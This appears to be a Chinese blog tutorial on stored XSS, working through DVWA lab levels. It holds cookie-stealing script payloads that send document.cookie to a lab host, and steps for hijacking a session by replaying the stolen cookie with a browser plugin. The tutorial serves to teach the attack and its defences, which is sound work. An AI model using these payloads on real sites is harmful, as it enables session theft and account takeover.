XSS漏洞原理(三)存储型

简介: XSS漏洞原理(三)存储型

概述

image.png

存储型XSS公鸡是一种常见的网络安全漏洞,其原理如下:

公鸡者在交互页面输入恶意代码,并将其提交到Web程序。

如果Web程序没有对输入内容进行XSS防范,恶意代码将被存储到数据库中。

当其他用户访问和查看公鸡者提交的内容时,Web应用程序从数据库中获取内容并传递给前端。

前端解析恶意代码,导致XSS公鸡的发生。

公鸡者利用存储型XSS漏洞可以执行恶意脚本,窃取用户的敏感信息,如登录凭证、个人信息等。这种公鸡方式的危害性较高,因为恶意代码存储在数据库中,可以影响到所有访问该内容的用户。

为了防止存储型XSS公鸡,开发人员应该对用户输入进行严格的过滤和验证,确保输入的内容不包含恶意代码。常见的防御措施包括对输入进行转义处理、使用安全的编码方式、限制输入的长度和格式等。

低安全级别

弹框告警

后台代码分析

image.png

stripslashes() 函数删除由 addslashes() 函数添加的反斜杠  

提示:该函数可用于清理从数据库中或者从 HTML 表单中取回的数据。

\  

mysql_real_escape_string() 函数转义 SQL 语句 中使用的字符串中的特殊字符

提示:可使用本函数来预防数据库公鸡。

'  

以上函数不针对xss做过滤

渗tou机

image.png

靶机

image.png

Cookie获取

image.png

渗tou机  

<script>document.locatinotallow=" http://172.16.70.216/cookie.php?cookie="+document.cookie</script>  

<script>new Image().src="http://172.16.70.216/cookie.php?cookie="+document.cookie;</script>  

image.png

image.png


image.png

靶机

image.png

Cookie利用  

①firefox安装tamper data插件

image.png

②开启tamper data

image.png

image.png


③浏览器输入172.16.70.156/dvwa/index.php

image.png


image.png


④tamper拦截,修改cookie为获取到的值,然后点击“tamper”,之后便跳转到首页


image.png


image.png


⑤查看首页左下角是否此cookie对应的用户

image.png

中安全级别

代码分析

message通过htmlspecialchars做了安全转义,但是name没有

image.png

渗tou机

<script>new Image().src="http://172.16.70.216/cookie.php?cookie="+document.cookie;</script>  

修改name字段前端代码的字符限制  

高安全级别

image.png














相关文章
|
14天前
|
安全 网络安全 数据安全/隐私保护
XSS 漏洞可能会带来哪些危害?
【10月更文挑战第26天】XSS漏洞可能会给网站和用户带来诸多严重危害
|
14天前
|
存储 监控 安全
|
16天前
|
存储 JSON 安全
2024全网最全面及最新的网络安全技巧 二 之 CSRF+XSS漏洞的各类利用技巧
2024全网最全面及最新的网络安全技巧 二 之 CSRF+XSS漏洞的各类利用技巧
|
1月前
|
Web App开发 安全 关系型数据库
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
|
1月前
|
安全
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
|
1月前
|
开发框架 安全 JavaScript
xss漏洞原理(四)自动化XSS
xss漏洞原理(四)自动化XSS
|
1月前
|
安全 Apache PHP
XSS漏洞理由(二)反射型
XSS漏洞理由(二)反射型
|
10天前
|
JavaScript 安全 前端开发
同源策略如何防止 XSS 攻击?
【10月更文挑战第31天】同源策略通过对 DOM 访问、Cookie 访问、脚本执行环境和跨源网络请求等多方面的严格限制,构建了一道坚实的安全防线,有效地防止了 XSS 攻击,保护了用户在网络浏览过程中的数据安全和隐私。
78 49
|
16天前
|
安全 前端开发 Java
Web安全进阶:XSS与CSRF攻击防御策略深度解析
【10月更文挑战第26天】Web安全是现代软件开发的重要领域,本文深入探讨了XSS和CSRF两种常见攻击的原理及防御策略。针对XSS,介绍了输入验证与转义、使用CSP、WAF、HTTP-only Cookie和代码审查等方法。对于CSRF,提出了启用CSRF保护、设置CSRF Token、使用HTTPS、二次验证和用户教育等措施。通过这些策略,开发者可以构建更安全的Web应用。
49 4
|
15天前
|
安全 Go PHP
Web安全进阶:XSS与CSRF攻击防御策略深度解析
【10月更文挑战第27天】本文深入解析了Web安全中的XSS和CSRF攻击防御策略。针对XSS,介绍了输入验证与净化、内容安全策略(CSP)和HTTP头部安全配置;针对CSRF,提出了使用CSRF令牌、验证HTTP请求头、限制同源策略和双重提交Cookie等方法,帮助开发者有效保护网站和用户数据安全。
42 2